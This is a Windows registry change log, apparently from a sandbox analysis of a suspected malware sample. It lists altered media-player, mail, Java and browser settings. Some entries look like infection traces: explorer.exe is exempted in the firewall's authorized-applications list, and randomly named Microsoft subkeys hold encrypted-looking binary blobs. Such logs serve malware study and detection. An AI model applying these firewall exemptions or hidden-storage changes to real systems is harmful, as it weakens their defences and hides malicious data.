HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-mpeg	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-mpeg2a	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-asf	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-asf-plugin	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wm	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wmv	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wmx	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wvx	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-msvideo	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mms	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mmst	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mmsu	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\msbd	UserApprovedOwning		"yes"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19	RefCount	dword:00000003	dword:00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control	ActiveService		"RasMan"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control	ActiveService		"TapiSrv"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch	Epoch	dword:00000009	dword:0000000c
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List	C:\WINDOWS\explorer.exe		"C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer"
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\WINDOWS\explorer.exe		"Windows Explorer"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities	Identity Ordinal	dword:00000001	dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}	Identity Ordinal		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	VerStamp	dword:00000000	dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	SpellDontIgnoreDBCS		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	MSIMN		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	StoreMigratedV5		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	ConvertedToDBX		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	Settings Upgraded		dword:00000007
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	Running		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	Store Root		hex(2):25,55,73,65,72,50,72,6f,66,69,6c,65,25,5c,4c,6f,63,61,6c,20,53,65,74,74,69,6e,67,73,5c,41,70,70,6c,69,63,61,74,69,6f,6e,20,44,61,74,61,5c,49,64,65,6e,74,69,74,69,65,73,5c,7b,46,30,37,46,43,37,31,39,2d,31,38,45,42,2d,34,42,37,31,2d,38,31,30,43,2d,43,41,44,36,46,43,39,32,30,38,35,37,7d,5c,4d,69,63,72,6f,73,6f,66,74,5c,4f,75,74,6c,6f,6f,6b,20,45,78,70,72,65,73,73,5c,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	SpoolerDlgPos		hex:2c,00,00,00,00,00,00,00,01,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,b6,01,00,00,a9,00,00,00,9e,03,00,00,43,01,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	SpoolerTack		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	Compact Check Count		dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail	Welcome Message		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail	Accounts Checked		hex:00,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail	Safe Attachments		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail	Secure Safe Attachments		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail	Default_CodePage		dword:00006faf
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News	Accounts Checked		hex:00,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules\Mail
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Main
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Settings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment\1.6.0_29
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment\1.6.0_29	BalloonShown		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy	LastUpdateBeginTime		"Sat, 22 Sep 2012 16:30:08 GMT"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy	LastUpdateFinishTime		"Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy	VersionXmlURL		"http://javadl-esd.sun.com/update/1.6.0/au-descriptor-1.6.0_35-b10.xml"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX	UpdateSchedule		dword:00000011
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX	UpdateScheduleMinutes		dword:0000001a
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX	Frequency		dword:00000020
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX	LastUpdateInvokedTime		"Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D\MostRecentApplication
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D\MostRecentApplication	Name		"java.exe"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager	Server ID		dword:00000004
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager	Default LDAP Account		"Active Directory GC"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts	PreConfigVer		dword:00000004
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts	PreConfigVerNTDS		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts	ConnectionSettingsMigrated		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts	AssociatedID		hex:19,c7,7f,f0,eb,18,71,4b,81,0c,ca,d6,fc,92,08,57,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Server ID		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	Account Name		"Active Directory"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Server		"NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Search Return		dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Timeout		dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Authentication		dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Simple Search		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Bind DN		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Port		dword:00000cc4
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Resolve Flag		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Secure Connection		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP User Name		"NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Search Base		"NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Server ID		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	Account Name		"Bigfoot Internet Directory Service"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Server		"ldap.bigfoot.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP URL		"http://www.bigfoot.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Search Return		dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Timeout		dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Authentication		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Simple Search		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Logo		hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,62,69,67,66,6f,6f,74,2e,62,6d,70,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Server ID		dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	Account Name		"VeriSign Internet Directory Service"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Server		"directory.verisign.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP URL		"http://www.verisign.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Search Return		dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Timeout		dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Authentication		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Search Base		"NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Simple Search		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Logo		hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,76,65,72,69,73,69,67,6e,2e,62,6d,70,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Server ID		dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	Account Name		"WhoWhere Internet Directory Service"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Server		"ldap.whowhere.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP URL		"http://www.whowhere.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Search Return		dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Timeout		dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Authentication		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Simple Search		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere	LDAP Logo		hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,77,68,6f,77,68,65,72,65,2e,62,6d,70,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Rowi
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Rowi	Xoywarsu		hex:ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,da,81,20,17,73,ab,ee,51,52,94,51,12,67,6e,e8,7a,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,8a,c7,26,4a,74,cb,75,91,2d,a4,34,86,54,16,8b,30,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Siabvu
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Siabvu	Vumyyfdol		hex:8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,75,13,7f,ce,dc,8a,b9,4f,2f,3e,98,05,e5,54,e7,1e,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4	OlkContactRefresh		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4	OlkFolderRefresh		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4	FirstRun		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4\Wab File Name
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4\Wab File Name	@		"C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	FriendlyName		"Default MidiOut Device"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	CLSID		"{07B65360-C445-11CE-AFDE-00AA006C14F4}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	FilterData		hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,38,00,00,00,48,00,00,00,6d,69,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	MidiOutId		dword:ffffffff
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	FriendlyName		"Default DirectSound Device"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	CLSID		"{79376820-07D0-11CF-A24D-0020AFD79767}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	FilterData		hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,08,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,a8,00,00,00,b8,00,00,00,31,74,79,33,00,00,00,00,a8,00,00,00,c8,00,00,00,32,74,79,33,00,00,00,00,a8,00,00,00,d8,00,00,00,33,74,79,33,00,00,00,00,a8,00,00,00,e8,00,00,00,34,74,79,33,00,00,00,00,a8,00,00,00,f8,00,00,00,35,74,79,33,00,00,00,00,a8,00,00,00,08,01,00,00,36,74,79,33,00,00,00,00,a8,00,00,00,18,01,00,00,37,74,79,33,00,00,00,00,a8,00,00,00,28,01,00,00,61,75,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,01,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,09,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,03,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,92,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,40,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,41,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,64,01,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,49,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	DSGuid		"{00000000-0000-0000-0000-000000000000}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Privacy
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Privacy	CleanCookies		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing	NewTabPageShowClosedTabs		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing	NewTabPageShowActivities		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\CommandBar	CompatibilityViewButtonBalloonCount	dword:00000001	dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Recovery\Active	{8CFA7582-04D2-11E2-A16C-08002765500A}		dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Recovery\Active	{E4F1361D-04D0-11E2-A16B-08002765500A}	dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}	AttemptedAutoRun		dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{976ABECA-93F7-4d81-9187-2A6137829675}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{99DB05E3-F81E-4C8A-A252-F396306AB6FE}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9F9562EB-15B6-46C6-A7CB-0A66FC65130E}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9FA014E3-076F-4865-A73C-117131B8E292}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{D5E49195-ED19-40fb-9EE0-E6625A808B77}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{E641D09E-E500-4c09-8260-F1CD7B902E9C}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{F24A1BC2-2331-4B91-8A13-5A549DA56E9D}
